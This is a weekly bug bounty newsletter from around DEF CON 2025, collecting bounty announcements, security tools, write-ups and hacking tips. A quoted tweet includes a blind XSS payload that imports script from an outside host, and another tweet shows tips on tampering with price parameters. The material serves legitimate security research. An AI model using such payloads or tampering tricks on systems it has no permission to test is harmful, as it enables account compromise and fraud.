- Disclosed.
- Posts
- Disclosed. August 3, 2025. $1M WhatsApp Bounty, AI Exploit for CVE-2025-32433, Bug Bounty Village CTF Prizes, and More
Disclosed. August 3, 2025. $1M WhatsApp Bounty, AI Exploit for CVE-2025-32433, Bug Bounty Village CTF Prizes, and More
The bug bounty world, curated.
Welcome to Disclosed.

Each week, 3 readers will win a 1-month PentesterLab Pro license, completely free. Refer a friend to the newsletter to enter.
Shout out to this week’s winners (I will email you):
adityasingh199919
harsh20csu181
badrigoud876
PentesterLab is one of the best hands-on platforms for learning web security, with real-world vulnerabilities, private labs, and practical exercises trusted by professionals and bug bounty hunters worldwide.
Huge thanks to PentesterLab for sponsoring this giveaway and supporting the Disclosed. community. ❤️
By the way, referrals are so low right now that almost everyone who has referred someone has received a PentesterLab license. Your chances of being selected are VERY HIGH

Hey there! This is the last post before DEF CON, which is crazy to say out loud considering how many months of planning and work have gone into Bug Bounty Village. It’s about to all be on full display… I definitely will need a vacation once DEF CON is over.
Related, I’m dealing with some nerve pain so will be rolling around in a rental scooter this year, but if you’re coming to Vegas and see me rolling (literally) please feel free to say hi! Would love to connect with all of you. Don’t forget about the Happy Hour that we’re hosting Thursday night as well. Given that I’ll be at the con all weekend, I will miss a Disclosed drop next week for the first time. Just heads up on that, but I’ll definitely be back.
That said, I was able to collab with shaikhyaser this weekend and pop a couple bugs so maybe we’ll have some money to gamble with while we’re in Vegas 😏
HUGE shout-out to the Critical Thinking podcast for featuring Ariel and I on the podcast this week. If you want to learn more about my story, and the origin of Bug Bounty Village, definitely give that pod a listen.
That’s enough about me, let’s dive in.
P.S. Our BBV green badges are about to sell out and won’t be available for purchase onsite. If you’re coming to DEF CON, this is your last chance to grab one. We have less than 50 units left: shop.bugbountydefcon.com
In This Issue

Community Management in Bug Bounty [🎥 Video]
by Critical Thinking - Bug Bounty Podcast
Harley Kimball (@infinitelogins) and Ariel Garcia (@arl_rose) join the conversation to dive into the world of community management in Bug Bounty. The episode explores how these roles shape the ecosystem, the evolution of Bug Bounty Village at DEFCON, and what’s planned for this year.
Read more →
AI-Driven Exploit for CVE-2025-32433 Demonstrated [🔗 Tweet]
by André Baptista
Check out this tweet discussing an article that details the use of AI to develop an exploit for CVE-2025-32433, showcasing innovative techniques prior to public exploit releases.
Read more →
If you're learning about vibe hacking, here's a cool article demonstrating how @mattrkeeley used AI to create a working exploit for CVE-2025-32433 before any public PoCs existed!
Worth a read 👇
platformsecurity.com/blog/CVE-2025-…— André Baptista (@0xacb)
9:07 AM • Jul 31, 2025
Bug Bounty Village CTF Prize List is Announced [🔗 CTF]
by Bug Bounty Village
Compete in the Bug Bounty Village CTF at DEFCON for a chance to win in-person prizes like PS5s, Meta Quest 3s, and more, with the prize ceremony on Sunday, Aug 10 at 1 PM in W326. Remote participants can also score rewards including OffSec course vouchers, SecOps gift cards, and Pentesterlab licenses. Register now at bbv.ctf.ae.
Read more →

Have something you want to Spotlight? Tell me.

Pwn2Own Ireland 2025: $1 Million WhatsApp Bounty Announced [🔗 Tweet]
by Trend Zero Day Initiative
The tweet announces Pwn2Own Ireland for 2025, featuring a $1 million bounty for exploiting WhatsApp and introducing new USB attack vectors.
Read more →
Announcing #Pwn2Own Ireland for 2025! We return to the Emerald Isle with our new partner @Meta and a $1,000,000 WhatsApp bounty. Yes - one million dollars. Plus new USB attack vectors on phones and more. Check out the details at zerodayinitiative.com/blog/2025/7/30…
— Trend Zero Day Initiative (@thezdi)
7:08 PM • Jul 31, 2025
GrabSG Celebrates 10 Years with Up to 2X Bounty Multipliers [🔗 Tweet]
by HackerOne
GrabSG is celebrating its 10th anniversary on HackerOne with a campaign featuring up to 2X bounty multipliers and special bonuses starting August 11.
Read more →
🚨 Heads up, researchers!
@GrabSG is turning 10 on HackerOne—and you're invited to the celebration. 🎉
💥 Up to 2X bounty multipliers
💥 Special bonuses
Start poking around now—campaign kicks off Aug 11. hackerone.com/grab
#togetherwehitharder#hackforgood#BugBounty
— HackerOne (@Hacker0x01)
2:00 AM • Aug 1, 2025
AI Pentester XBOW Tops HackerOne Leaderboard [🔗 Tweet]
by XBOW
The tweet announces that XBOW, an autonomous AI pentester, has become the top hacker on HackerOne, with a live demonstration scheduled at Black Hat.
Read more →
XBOW is now the #1 hacker on HackerOne, globally.
For the first time, our autonomous AI pentester tops the worldwide leaderboard.
Next week at #BlackHat, we’re taking it live:
We’ll run real-time on HackerOne programs—come see XBOW find vulnerabilities.📍 Booth 3257
— XBOW (@Xbow)
10:02 PM • Jul 31, 2025
HackerOne Expands with New Office in Pune [🔗 Tweet]
by Maharashtra Progress Tracking
HackerOne has announced the opening of a new office in Pune, enhancing its operational capacity.
Read more →
#Pune
San Francisco based Security company Hackerone opens new Office in Pune— Maharashtra Progress Tracking (@abhirammodak)
7:48 PM • Jul 30, 2025
LidoFinance Launches $100K Bonus in Bug Bounty Competition [🔗 Tweet]
by Immunefi
Immunefi announces a new bug bounty competition for LidoFinance, offering a $100,000 bonus pool to incentivize researchers to identify vulnerabilities within the Dual Governance codebase.
Read more →
🚨 Introducing a New Way to Hunt: Immunefi Bug Bounty Competition!
We’re thrilled to announce that @LidoFinance is launching a $100,000 bonus reward pool on top of their existing bug bounty program, with a maximum bounty of up to $2 million! 🔥
This is your chance to dive into
— Immunefi (@immunefi)
4:06 PM • Jul 28, 2025
Swiss Post Launches €230K E-Voting Bug Bounty Challenge [🔗 Tweet]
by YesWeHack ⠵
The Swiss Post's 2025 Public Intrusion Test has commenced, inviting global bug hunters to exploit its e-voting platform for rewards up to €230K, including bonuses for early submissions.
Read more →
🔔 It’s time! Swiss Post’s 2025 Public Intrusion Test starts today.
Until 24 Aug, bug hunters worldwide can test the e-voting platform of @swisspost and earn up to €230K per valid report - with a €3K bonus for the first 3 findings 💰
Try it out 👉 yeswehack.com/programs/swiss…
— YesWeHack ⠵ (@yeswehack)
6:47 AM • Jul 28, 2025
Did I miss an important update? Tell me.

Custom Pentesting Report Generator for Burp Suite [🔗 Tweet]
by BApp Store
A newly released Report Generator allows pentesters to produce customized reports directly from Burp Suite findings, with options for PDF and Word formats, significantly streamlining the reporting process.
Read more →
New: Report Generator
Create pentesting reports in custom formatting directly from Burp Suite findings.
📄 Export to PDF & Word formats
🏷️ OWASP Top 10 2021 categorization
📸 Easy screenshot embeddingStreamline your reporting workflow today.
— BApp Store (@BApp_Store)
3:59 PM • Jul 31, 2025
New Caido Update Enhances Workflow Testing Features [🔗 Tweet]
by Caido
The latest update for Caido enhances users' ability to test active and passive workflows during development, improving the debugging process with sample requests and responses.
Read more →
You can now test active and passive workflows in development.
Set a sample request and response, then click "Run" with the log panel recording enabled, to see the workflow in action without leaving the editor.
Part of Caido v0.50.0 → caido.io/blog/2025-07-2…
— Caido (@CaidoIO)
12:00 PM • Jul 30, 2025
\Have a favorite tool? Tell me.

Exploiting a Logic Flaw in a Coding Platform [🔗 Tweet]
by Nagli
This tweet shares a detailed thread on exploiting a logic flaw in a coding platform, which resulted in unauthorized access to private applications, providing useful insights for fellow researchers.
Read more →
I hacked a popular vibe coding platform with a simple, straight-forward logic flaw - allowing access to private applications . Here’s how I did it 🧵
— Nagli (@galnagli)
2:52 PM • Jul 29, 2025
How I find vulnerability can make X(Twitter) lose millions of dollars | by L4zyhacker | Jul, 2025 | Medium [📓 Blog]
by L4zyhacker
The post details the author's journey in discovering a vulnerability in X's payment system concerning the AI service GROK, which could lead to significant financial loss. It discusses technical issues such as rate limits, offers insights into a reward of $1200, and underscores the perseverance required when submitting findings.
Read more →
Mozilla | Report #2995025 - Mozilla VPN Clients: RCE via file write and path traversal [📓 H1 Report]
by Rein Daelman (@reindaelman)
This report details a critical path traversal vulnerability in the Mozilla VPN client that enables remote code execution, emphasizing the importance of sanitizing file paths and showcasing how such vulnerabilities can be exploited.
Read more →
€1500 bounty — How I Bypassed 403 Forbidden and Gained Access to the Intranet Portal. | by Ashar Mahmood | Jul, 2025 | Medium [📓 Blog]
by Ashar Mahmood (@Hx_0p)
The blog post narrates how Ashar Mahmood discovered an Authorization Bypass vulnerability that allowed access to an intranet portal, emphasizing the importance of session management and HTTP request manipulation for effective exploitation.
Read more →
GitHub - sayan011/Immunefi-bug-bounty-writeups-list: curation of all(most) immunefi bug bounty writeups I could find(till now) [📁 Repo]
by sayan011 (@ayan_011)
This GitHub repository offers a curated collection of Immunefi-related bug bounty write-ups, providing valuable insights into past vulnerabilities, research responsibilities, and payout details for new researchers.
View the repo →
Discovering Blind SQLi While Hunting for Geo-Bypass [🔗 Blog]
by Nico Waisman at XBOW
The author shares insights on discovering a blind SQL injection vulnerability during a geo-bypass hunt, including a detailed technical analysis of the methodologies employed.
Read more →
Did I miss an important update? Tell me.

Lessons Learned from Earning $250K with Blind XSS [🎥 Video]
by Ben Sadeghipour (@nahamsec)
This video discusses the author's journey to earning over $250K through Blind XSS and a breakdown of tips and lessons learned throughout that experience.
Read more →
Still not found your first bug? Try IDORs [🎥 Video]
by InsiderPhD
This comprehensive video tutorial explains Insecure Direct Object References (IDOR) vulnerabilities, demonstrating practical exploitation techniques using Burp Suite.
Watch video →
Bug Bounty Tip: Advanced GitHub Dorking for Maximum Results! [🎥 Video]
by Medusa
This video covers advanced GitHub dorking techniques to uncover sensitive data in code repositories, detailing effective search operators and their applications.
Watch video →
Exploring XXE Exploitation in Hex Color Palette Challenge [🔗 Tweet]
by YesWeHack ⠵
The video outlines a Dojo challenge focused on exploiting XXE vulnerabilities and utilizing local DTDs for file exfiltration.
Read more →
Did I miss something? Tell me.

Bypassing Reverse Proxies: How to identify the origin IP [📓 Blog]
by Intigriti
This article discusses techniques for revealing the origin IP of servers behind reverse proxies, crucial for ethical hackers seeking bypass methods for web application firewalls.
Read more →

Secrets of Cross-Site Scripting (XSS [📓 Blog]
by Ahmed Elsayyad
This post dives deeply into Cross-Site Scripting (XSS) vulnerabilities, outlining attack vectors, testing methodologies, and mitigation strategies while providing practical examples.
Read more →

XSS attacks & exploitation: the ultimate guide – YesWeHack [📓 Blog]
by Alex Brumen & YesWeHack
This extensive guide comprehensively covers XSS vulnerabilities, discussing types, detection strategies, and exploitation techniques critical for ethical hackers.
Read more →

Guide to Finding Vulnerabilities Using GitHub Search [📝 Writeup]
by Intigriti
This guide provides practical insights on how to effectively find vulnerabilities through GitHub search, enhanced with relevant examples.
Read more →
Finding more vulnerabilities with GitHub search (full guide with examples)! 🤠
A thread! 🧵 👇
— Intigriti (@intigriti)
9:07 AM • Aug 1, 2025
Intro to Browser Security Research: Practical Examples and Advice [📓 Blog]
by Ivan Fratrić
This document introduces a guide for browser security research, offering practical examples and addressing the challenges of automation using AI in this space.
Read more →
Prompt Engineering Toolkit for JavaScript Recon (2025 Edition) [📓 Blog]
by Narendar Battula (nArEn)
This guide focuses on the 'Prompt Engineering Toolkit for JavaScript Recon' to improve analysis of common JavaScript vulnerabilities, highlighting the importance of AI in reconstructing actionable intelligence.
Read more →
Did I miss something? Tell me.

Automate Cookie Cleanup in Burp Suite with Regex [🔗 Tweet]
by 🇷🇴 cristi
This tweet shares a regex solution for automatically removing unwanted cookies in Burp Suite, improving the efficiency of the testing process.
Read more →
In @Burp_Suite, sometimes you want to automatically removed all those unwanted cookies and keep it clean.
Use match/replace:
Match (regex):
(?i)^Cookie:\s*.*?\b((?:cookie1|cookie2)=[^;]+)(?:.*?(;\s*(?:cookie1|cookie2)=[^;]+))?.*$
Replace:
Cookie: $1$2
— 🇷🇴 cristi (@CristiVlad25)
11:25 AM • Jul 31, 2025
Live Bug Hunting Breaks Discord Stream Record [🔗 Tweet]
by Critical Thinking - Bug Bounty Podcast
In a recent live-streaming event, numerous bugs were discovered, showcasing the excitement of community participation.
Read more →
Aaaand we popped like 8 bugs live. Almost capped out Discord's live stream limit of 300 listeners.
Freaking love you guys. You'll never cease to amaze me on these HackAlongs
-Rhynorater
— Critical Thinking - Bug Bounty Podcast (@ctbbpodcast)
8:21 PM • Aug 1, 2025
Eight Techniques to Obfuscate Transfer-Encoding Header [🔗 Tweet]
by Web Security Academy
This tweet examines eight methods for obfuscating the transfer-encoding header to enhance security testing techniques.
Read more →
8 ways to obfuscate the transfer-encoding header 👇
— Web Security Academy (@WebSecAcademy)
5:35 PM • Aug 1, 2025
Creating Clear Bug Reports for Maximized Bounty Rewards [🔗 Tweet]
by STÖK ✌️
The tweet emphasizes that clear reports and proofs of concept are crucial for successful bounty hunting, helping maximize bounty rewards.
Read more →
Bounty fever is real.
Since bounties by design is a high risk / high reward game, where all the hardworking hours required to identify a bug itself isn’t enough. you will also need to create a clear and non disputable report of the finding, including a poc (preferably a video)— STÖK ✌️ (@stokfredrik)
7:40 PM • Jul 29, 2025
Create Your Own VPN Using SSH for Proxying [🔗 Tweet]
by solst/ICE
Learn how to create a VPN-like proxy using SSH tunneling to route browser traffic through a remote host with this tweet.
Read more →
Make your own vpn:
1. SSH to a host with:
ssh user@host -D 80812. Point your browser proxy settings to localhost port 8081, and mark it as a SOCKS v5 proxy.
3. You now are proxying your browser traffic to where that host is, like a vpn.
— solst/ICE (@IceSolst)
1:00 PM • Jul 31, 2025
Successful Blind XSS Exploit Leads to $250K Bounty [🔗 Tweet]
by Sleepah
This tweet spotlights a successful blind XSS attack that netted a researcher a $250K bounty, accompanied by a shared example payload.
Read more →
nod to @NahamSec.
watching the $250K blind xss and provided someone the payload you showed <svg/onload=import('mybxss.site')>
They're in the process of receiving a bounty from a private program.
#BugBounty#hacking#pentesting #pentest— Sleepah (@SLEEPAH__h1)
6:05 PM • Jul 30, 2025
Finding Logic Bugs: Reverse Engineering Steps [🔗 Tweet]
by oussama htb
This tweet outlines a methodical two-step approach for identifying logic bugs in applications through reverse engineering and parameter manipulation.
Read more →
How to Find logic bug (part 1)
Step 1: Reverse Engineer the App’s Logic
Observe normal workflows (signup, checkout, profile updates).
Step 2: Tamper with Every Parameter
Use Burp Suite to modify:
Prices (amount=100 → amount=0.01)
Dates (expiry=2025 → expiry=2099) or user id— oussama htb (@elhattaboussama)
9:13 PM • Jul 30, 2025
Distinguishing Between ATO and Access Control Bugs [🔗 Tweet]
by bugcrowd
This informative tweet explains the differences between Account Takeover (ATO) bugs and access control issues, enhancing understanding and testing strategies.
Read more →
Confusing ATO with access control bugs can cost you bounties.
They may look similar, but they occur at completely different stages.
Here’s how to tell them apart 👇
1️⃣ Stage of Attack
ATO targets the authentication stage (before or during login).
Access control bugs appear— bugcrowd (@Bugcrowd)
5:02 PM • Jul 29, 2025
Essential GitHub Dorks for Vulnerability Discovery [🔗 Tweet]
by Intigriti
This tweet shares a curated list of popular GitHub dorks to facilitate the identification of vulnerabilities in repositories.
Read more →
List with popular GitHub dorks to help you find more vulnerabilities! 😎
— Intigriti (@intigriti)
9:08 AM • Jul 30, 2025
Did I miss something? Tell me.
Did you like this week's drop?Please share feedback. |
Because Disclosure Matters: This newsletter was produced with the assistance of AI. While I strive for accuracy and quality, not all content has been independently vetted or fact-checked. Please allow for a reasonable margin of error. The views expressed are my own and do not reflect those of my employer.